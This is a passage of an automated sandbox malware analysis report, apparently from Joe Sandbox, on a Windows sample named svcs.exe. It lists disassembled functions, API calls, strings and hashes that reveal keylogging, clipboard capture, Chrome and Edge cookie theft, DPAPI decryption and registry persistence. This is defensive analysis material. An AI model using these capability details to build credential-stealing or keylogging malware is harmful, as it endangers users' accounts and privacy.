                                  • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                  • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                • _free.LIBCMT ref: 004509E6
                                • _free.LIBCMT ref: 004509F8
                                • _free.LIBCMT ref: 00450A0A
                                • _free.LIBCMT ref: 00450A1C
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                • Instruction ID: 8e1836d4b3683ea2f551dac33bf8b94159c93f8dbbc189607f67f5fa0db289e6
                                • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                • Instruction Fuzzy Hash: F3F04F76504600B79620EB5DE8C2C1B73D9EA0571A795891BF66CDB612CB38FCC0869C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • _free.LIBCMT ref: 00444066
                                  • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                  • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                • _free.LIBCMT ref: 00444078
                                • _free.LIBCMT ref: 0044408B
                                • _free.LIBCMT ref: 0044409C
                                • _free.LIBCMT ref: 004440AD
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                • Instruction ID: c4ed0220327abb1134bcf7d54e43c2409a3611c90002b0fe773cef56a7474a4d
                                • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                • Instruction Fuzzy Hash: 11F03AB18009208FA631AF2DBD414053B61E705769346822BF62C62A70C7B94ED2CFCF
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: PkGNG
                                • API String ID: 0-263838557
                                • Opcode ID: 6a83c2428ddcf6ea71a3f14a315267ad78d224b448d93c685a7e270e7132f7c7
                                • Instruction ID: 56b21f6c39f874414c878b072b89285690216c2d241c0ad811085e1835033e53
                                • Opcode Fuzzy Hash: 6a83c2428ddcf6ea71a3f14a315267ad78d224b448d93c685a7e270e7132f7c7
                                • Instruction Fuzzy Hash: 1B51B271D00249AAEF14DFA9C885FAFBBB8EF45314F14015FE400A7291DB78D901CBA9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • _strpbrk.LIBCMT ref: 0044E738
                                • _free.LIBCMT ref: 0044E855
                                  • Part of subcall function 0043BD19: IsProcessorFeaturePresent.KERNEL32(00000017,0043BCEB,?,?,?,?,?,00000000,?,?,0043BD0B,00000000,00000000,00000000,00000000,00000000), ref: 0043BD1B
                                  • Part of subcall function 0043BD19: GetCurrentProcess.KERNEL32(C0000417), ref: 0043BD3D
                                  • Part of subcall function 0043BD19: TerminateProcess.KERNEL32(00000000), ref: 0043BD44
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                • String ID: *?$.
                                • API String ID: 2812119850-3972193922
                                • Opcode ID: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                • Instruction ID: 94a4b4bbf586d133b1ca6d09685756ea089c4dad0dcc4a5060c65dcbb11523ea
                                • Opcode Fuzzy Hash: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                • Instruction Fuzzy Hash: B951C375E00109EFEF14DFAAC881AAEBBB5FF58314F25816EE454E7301E6399E018B54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: CountEventTick
                                • String ID: !D@$NG
                                • API String ID: 180926312-2721294649
                                • Opcode ID: a5a641677daa38105cbe42e75e0e2883f17254e83355899c77695e5a9bf74507
                                • Instruction ID: 1740d3d485f2be3f914829e5aa2a54ae858af1ae40273f66f7ff2800e9d96298
                                • Opcode Fuzzy Hash: a5a641677daa38105cbe42e75e0e2883f17254e83355899c77695e5a9bf74507
                                • Instruction Fuzzy Hash: 7E51A1316083019AC724FB32D852AEF73A5AF94314F50493FF54A671E2EF3C5949C68A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424DE
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424F3
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                • String ID: `#D$`#D
                                • API String ID: 885266447-2450397995
                                • Opcode ID: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                • Instruction ID: d0478598ef992627c852fcfbe86add3ca1c9fa58067414995f231753f3186543
                                • Opcode Fuzzy Hash: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                • Instruction Fuzzy Hash: 78519071A00208AFDF18DF59C980AAEBBB2FB94314F59C19AF81897361D7B9DD41CB44
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\microsofts\svcs.exe,00000104), ref: 00443475
                                • _free.LIBCMT ref: 00443540
                                • _free.LIBCMT ref: 0044354A
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$FileModuleName
                                • String ID: C:\Users\user\AppData\Roaming\microsofts\svcs.exe
                                • API String ID: 2506810119-274596292
                                • Opcode ID: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                • Instruction ID: 78b8e4ab202bb8962dfea6a4c95dea7b8c186c0554b41bb8e719afd17783d6d0
                                • Opcode Fuzzy Hash: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                • Instruction Fuzzy Hash: 2E31C471A00258BFEB21DF999C8199EBBBCEF85B15F10406BF50497311D6B89F81CB98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,FF8BC35D,00000000,?,PkGNG,0044BB7E,?,00000000,FF8BC35D), ref: 0044B8D2
                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0044B900
                                • GetLastError.KERNEL32 ref: 0044B931
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharErrorFileLastMultiWideWrite
                                • String ID: PkGNG
                                • API String ID: 2456169464-263838557
                                • Opcode ID: f29f19b57bd44476b84c2158df793cbd226619e25f42890a5cb9caccfef44ccc
                                • Instruction ID: a4f89274a665815b2d7bd0a52cbb4c71b9b2878c435ac706d73e761117ab6cd9
                                • Opcode Fuzzy Hash: f29f19b57bd44476b84c2158df793cbd226619e25f42890a5cb9caccfef44ccc
                                • Instruction Fuzzy Hash: 18317271A002199FDB14DF59DC809EAB7B8EB48305F0444BEE90AD7260DB34ED80CBA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                  • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F
                                  • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                                  • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                                  • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                • Sleep.KERNEL32(000000FA,00465E74), ref: 00404138
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                • String ID: /sort "Visit Time" /stext "$0NG
                                • API String ID: 368326130-3219657780
                                • Opcode ID: 5844705bffbe932e08c9a339546c7ba6e86f4bc1b82537618e6767435229dddb
                                • Instruction ID: 62b88373b0174ac8ae4090b78ebfd0a8fca35ca34796720d8357018cc2c92f87
                                • Opcode Fuzzy Hash: 5844705bffbe932e08c9a339546c7ba6e86f4bc1b82537618e6767435229dddb
                                • Instruction Fuzzy Hash: E9316271A0011956CB15FBA6D8969EE7375AB90308F40007FF206B71E2EF385D89CA99
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                • __Init_thread_footer.LIBCMT ref: 0040B797
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Init_thread_footer__onexit
                                • String ID: [End of clipboard]$[Text copied to clipboard]$hdF
                                • API String ID: 1881088180-1379921833
                                • Opcode ID: 324d16734c00dd0800ed2bf7710d2d62d1c0e2a3751a5b5203366b445deaa986
                                • Instruction ID: c7bebb0a0a15900a9cc4ffb6e17528162536323bfdf0e6139bd55c50ddf57f74
                                • Opcode Fuzzy Hash: 324d16734c00dd0800ed2bf7710d2d62d1c0e2a3751a5b5203366b445deaa986
                                • Instruction Fuzzy Hash: C0219F32A101054ACB14FB66D8829EDB379AF90318F10453FE505731E2EF386D4A8A9C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • _wcslen.LIBCMT ref: 004162F5
                                  • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                  • Part of subcall function 00413877: RegSetValueExA.ADVAPI32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                  • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                  • Part of subcall function 00409DE4: _wcslen.LIBCMT ref: 00409DFD
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: _wcslen$CloseCreateValue
                                • String ID: !D@$okmode$PG
                                • API String ID: 3411444782-3370592832
                                • Opcode ID: f3a158218bdd67d4c4b1fae7efd00a7e5adabf20f91f0610842615a967fde749
                                • Instruction ID: dff749dc984b923ba5de2327a6f3f9cc2e67bcaf748228c26ce3aec7d70e92d7
                                • Opcode Fuzzy Hash: f3a158218bdd67d4c4b1fae7efd00a7e5adabf20f91f0610842615a967fde749
                                • Instruction Fuzzy Hash: 10119371B442011ADB187B72D832ABD22969F94358F80443FF54AAF2E2DEBD4C51525D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0040C4C3: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C61D
                                • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C688
                                Strings
                                • User Data\Profile ?\Network\Cookies, xrefs: 0040C635
                                • User Data\Default\Network\Cookies, xrefs: 0040C603
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExistsFilePath
                                • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                • API String ID: 1174141254-1980882731
                                • Opcode ID: 3f8b8350712af9d240db3e3edefbc0b5893a2e7bcab5cac2a7822d9b4b4e7b0e
                                • Instruction ID: e6b9b9a8142aca5ff9e4641a3ff80a721fb4b0471daa7637ae592fad8ebd6223
                                • Opcode Fuzzy Hash: 3f8b8350712af9d240db3e3edefbc0b5893a2e7bcab5cac2a7822d9b4b4e7b0e
                                • Instruction Fuzzy Hash: B421037190011996CB14F7A2DC96CEEB738EE50319F40053FB502B31D2EF789A46C698
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0040C526: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6EC
                                • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C757
                                Strings
                                • User Data\Profile ?\Network\Cookies, xrefs: 0040C704
                                • User Data\Default\Network\Cookies, xrefs: 0040C6D2
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExistsFilePath
                                • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                • API String ID: 1174141254-1980882731
                                • Opcode ID: 8e96e49e63ca3bf0ac1f2790d6dd37b6dab53323dba9b7dc4ed1c0216d558f84
                                • Instruction ID: 83f6a23093d6b0727a30a1d550f3d6f5bdb2bb72864fa742cd8a9fd6423befd9
                                • Opcode Fuzzy Hash: 8e96e49e63ca3bf0ac1f2790d6dd37b6dab53323dba9b7dc4ed1c0216d558f84
                                • Instruction Fuzzy Hash: AE21D37190011AD6CB05F7A2DC96CEEB778EE50719B50013FF502B31D2EF789A46C698
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CreateThread.KERNEL32(00000000,00000000,0040A27D,004750F0,00000000,00000000), ref: 0040A1FE
                                • CreateThread.KERNEL32(00000000,00000000,0040A267,004750F0,00000000,00000000), ref: 0040A20E
                                • CreateThread.KERNEL32(00000000,00000000,0040A289,004750F0,00000000,00000000), ref: 0040A21A
                                  • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                                  • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateThread$LocalTimewsprintf
                                • String ID: Offline Keylogger Started
                                • API String ID: 465354869-4114347211
                                • Opcode ID: 3bd749956e3e9a916655ad8ba54339a6dfc039012b8b1fa6949936b121210f93
                                • Instruction ID: bcf1cfbdc14a627f6781ea3a40f7cea6448602225ce5b2be95dc640702f6c2bd
                                • Opcode Fuzzy Hash: 3bd749956e3e9a916655ad8ba54339a6dfc039012b8b1fa6949936b121210f93
                                • Instruction Fuzzy Hash: DE1194B12003187AD220B7369C86CBB765DDA8139CB00057FF946222D2EA795D54CAFB
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: LocalTime
                                • String ID: | $%02i:%02i:%02i:%03i $PkGNG
                                • API String ID: 481472006-3277280411
                                • Opcode ID: 978051ae2d71d51f6a46a557316c11cd91a1cbdf249e5825d4a92e87c892c4af
                                • Instruction ID: b0c371a91d376d28eb23a1cf2c2b6b2589463c7c7bf84255da33bc44f247512a
                                • Opcode Fuzzy Hash: 978051ae2d71d51f6a46a557316c11cd91a1cbdf249e5825d4a92e87c892c4af
                                • Instruction Fuzzy Hash: 361181714082055AC304EB62D8419BFB3E9AB44348F50093FF895A21E1EF3CDA49C65A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406A82
                                • GetProcAddress.KERNEL32(00000000), ref: 00406A89
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: CryptUnprotectData$crypt32
                                • API String ID: 2574300362-2380590389
                                • Opcode ID: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                • Instruction ID: d796ed41fc96dc9ef8d801536240fab0e9422483ab40f89d2a564a4d0f07de08
                                • Opcode Fuzzy Hash: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                • Instruction Fuzzy Hash: 6201B535B00216ABCB18DFAD9D449ABBBB8EB49300F14817EE95AE3341D674D9008BA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,10558B1C,10558B1C,PkGNG,0044C302,FF8BC369,00000000,00000002,00000000,PkGNG), ref: 0044C28C
                                • GetLastError.KERNEL32 ref: 0044C296
                                • __dosmaperr.LIBCMT ref: 0044C29D
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorFileLastPointer__dosmaperr
                                • String ID: PkGNG
                                • API String ID: 2336955059-263838557
                                • Opcode ID: 60eaf30ffa5a6b77e16cdf42a69bcf8f7fa5cf007f91ab5b57ca5c6e56bd7837
                                • Instruction ID: 03228b3a5a263cac3d3762c0c6cb9bea0ee6cefe7ee70a3785aa569069518732
                                • Opcode Fuzzy Hash: 60eaf30ffa5a6b77e16cdf42a69bcf8f7fa5cf007f91ab5b57ca5c6e56bd7837
                                • Instruction Fuzzy Hash: 9E016D32A11104BBDF008FE9CC4089E3719FB86320B28039AF810A7290EAB5DC118B64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                • CloseHandle.KERNEL32(?), ref: 004051CA
                                • SetEvent.KERNEL32(?), ref: 004051D9
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEventHandleObjectSingleWait
                                • String ID: Connection Timeout
                                • API String ID: 2055531096-499159329
                                • Opcode ID: 6ba0741fc7cdd8782e8632b0dc009c189a51354901c2dba2396252722e458400
                                • Instruction ID: e4880b57ed2806ada623013920947221b56867654f576af2420d72dde76e11cf
                                • Opcode Fuzzy Hash: 6ba0741fc7cdd8782e8632b0dc009c189a51354901c2dba2396252722e458400
                                • Instruction Fuzzy Hash: 1201D831A40F40AFE7257B368D9552BBBE0FF01302704097FE68396AE2D6789800CF59
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E833
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
